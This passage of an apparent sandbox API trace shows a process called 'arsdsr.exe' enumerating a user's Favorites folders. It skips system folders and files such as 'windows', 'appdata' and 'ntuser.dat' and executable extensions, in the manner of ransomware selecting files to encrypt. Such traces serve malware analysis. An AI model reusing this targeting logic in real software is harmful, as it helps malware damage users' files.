lpString2=".log") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.844] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.844] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0151.845] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.845] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2=".") returned 1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2="..") returned 1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2="...") returned 1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2="windows") returned -1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2="$recycle.bin") returned 1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2="rsa") returned -1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2="ntuser.dat") returned -1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2="programdata") returned -1 [0151.845] lstrcmpiW (lpString1="MSN Websites", lpString2="appdata") returned 1 [0151.846] lstrcmpiW (lpString1="MSN Websites", lpString2="program files") returned -1 [0151.846] lstrcmpiW (lpString1="MSN Websites", lpString2="program files (x86)") returned -1 [0151.846] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Favorites\\" | out: lpString1="C:/Users\\Default\\Favorites\\") returned="C:/Users\\Default\\Favorites\\" [0151.846] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites") returned="C:/Users\\Default\\Favorites\\MSN Websites" [0151.846] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\") returned="C:/Users\\Default\\Favorites\\MSN Websites\\" [0151.846] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\") returned="C:/Users\\Default\\Favorites\\MSN Websites\\" [0151.846] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\*.*") returned="C:/Users\\Default\\Favorites\\MSN Websites\\*.*" [0151.846] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.864] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.864] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.864] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.864] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.864] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2=".") returned 1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="..") returned 1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="...") returned 1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="windows") returned -1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="$recycle.bin") returned 1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="rsa") returned -1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="ntuser.dat") returned -1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="programdata") returned -1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="appdata") returned 1 [0151.864] lstrcmpiW (lpString1="MSN Autos.url", lpString2="program files") returned -1 [0151.865] lstrcmpiW (lpString1="MSN Autos.url", lpString2="program files (x86)") returned -1 [0151.865] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\") returned="C:/Users\\Default\\Favorites\\MSN Websites\\" [0151.865] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Autos.url" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned="C:/Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" [0151.865] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.865] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.865] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0151.865] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.865] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2=".") returned 1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="..") returned 1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="...") returned 1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="windows") returned -1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="$recycle.bin") returned 1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="rsa") returned -1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="ntuser.dat") returned -1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="programdata") returned -1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="appdata") returned 1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="program files") returned -1 [0151.865] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="program files (x86)") returned -1 [0151.865] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\") returned="C:/Users\\Default\\Favorites\\MSN Websites\\" [0151.865] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Entertainment.url" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned="C:/Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" [0151.865] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.865] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.865] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0151.865] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.865] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.866] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2=".") returned 1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="..") returned 1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="...") returned 1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="windows") returned -1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="$recycle.bin") returned 1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="rsa") returned -1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="ntuser.dat") returned -1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="programdata") returned -1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="appdata") returned 1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="program files") returned -1 [0151.866] lstrcmpiW (lpString1="MSN Money.url", lpString2="program files (x86)") returned -1 [0151.866] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\") returned="C:/Users\\Default\\Favorites\\MSN Websites\\" [0151.866] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Money.url" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned="C:/Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" [0151.866] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.866] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.866] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0151.866] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.866] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.866] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0151.866] lstrcmpiW (lpString1="MSN Sports.url", lpString2=".") returned 1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="..") returned 1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="...") returned 1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="windows") returned -1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="$recycle.bin") returned 1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="rsa") returned -1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="ntuser.dat") returned -1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="programdata") returned -1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="appdata") returned 1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="program files") returned -1 [0151.867] lstrcmpiW (lpString1="MSN Sports.url", lpString2="program files (x86)") returned -1 [0151.867] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\") returned="C:/Users\\Default\\Favorites\\MSN Websites\\" [0151.867] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Sports.url" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned="C:/Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" [0151.867] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.867] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.867] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0151.867] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.867] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.867] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.867] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.867] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.867] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.867] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.867] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.867] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.867] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2=".") returned 1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="..") returned 1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="...") returned 1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="windows") returned -1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="$recycle.bin") returned 1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="rsa") returned -1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="ntuser.dat") returned -1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="programdata") returned -1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="appdata") returned 1 [0151.867] lstrcmpiW (lpString1="MSN.url", lpString2="program files") returned -1 [0151.868] lstrcmpiW (lpString1="MSN.url", lpString2="program files (x86)") returned -1 [0151.868] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\") returned="C:/Users\\Default\\Favorites\\MSN Websites\\" [0151.868] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN.url" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned="C:/Users\\Default\\Favorites\\MSN Websites\\MSN.url" [0151.868] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.868] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.868] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0151.868] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.868] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2=".") returned 1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="..") returned 1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="...") returned 1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="windows") returned -1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="$recycle.bin") returned 1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="rsa") returned -1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="ntuser.dat") returned -1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="programdata") returned -1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="appdata") returned 1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="program files") returned -1 [0151.868] lstrcmpiW (lpString1="MSNBC News.url", lpString2="program files (x86)") returned -1 [0151.868] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\") returned="C:/Users\\Default\\Favorites\\MSN Websites\\" [0151.868] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSNBC News.url" | out: lpString1="C:/Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned="C:/Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" [0151.868] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.868] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.868] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0151.868] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0151.868] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0151.869] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0151.869] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0151.869] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0151.869] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0151.869] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0151.869] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0151.869] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0151.869] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0151.869] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.869] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0151.869] lstrcmpiW (lpString1="Windows Live", lpString2=".") returned 1 [0151.869] lstrcmpiW (lpString1="Windows Live", lpString2="..") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="...") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="windows") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="$recycle.bin") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="rsa") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="ntuser.dat") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="programdata") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="appdata") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="program files") returned 1 [0151.870] lstrcmpiW (lpString1="Windows Live", lpString2="program files (x86)") returned 1 [0151.870] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Favorites\\" | out: lpString1="C:/Users\\Default\\Favorites\\") returned="C:/Users\\Default\\Favorites\\" [0151.870] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\", lpString2="Windows Live" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live") returned="C:/Users\\Default\\Favorites\\Windows Live" [0151.870] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Windows Live", lpString2="\\" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\") returned="C:/Users\\Default\\Favorites\\Windows Live\\" [0151.870] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\") returned="C:/Users\\Default\\Favorites\\Windows Live\\" [0151.870] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\*.*") returned="C:/Users\\Default\\Favorites\\Windows Live\\*.*" [0151.870] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Favorites\\Windows Live\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0152.582] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0152.582] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0152.582] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0152.582] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0152.582] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0152.582] lstrcmpiW (lpString1="Get Windows Live.url", lpString2=".") returned 1 [0152.582] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="..") returned 1 [0152.582] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="...") returned 1 [0152.582] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="windows") returned -1 [0152.582] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="$recycle.bin") returned 1 [0152.582] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="rsa") returned -1 [0152.582] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="ntuser.dat") returned -1 [0152.583] lstrcmpiW (lpString1="Get Windows 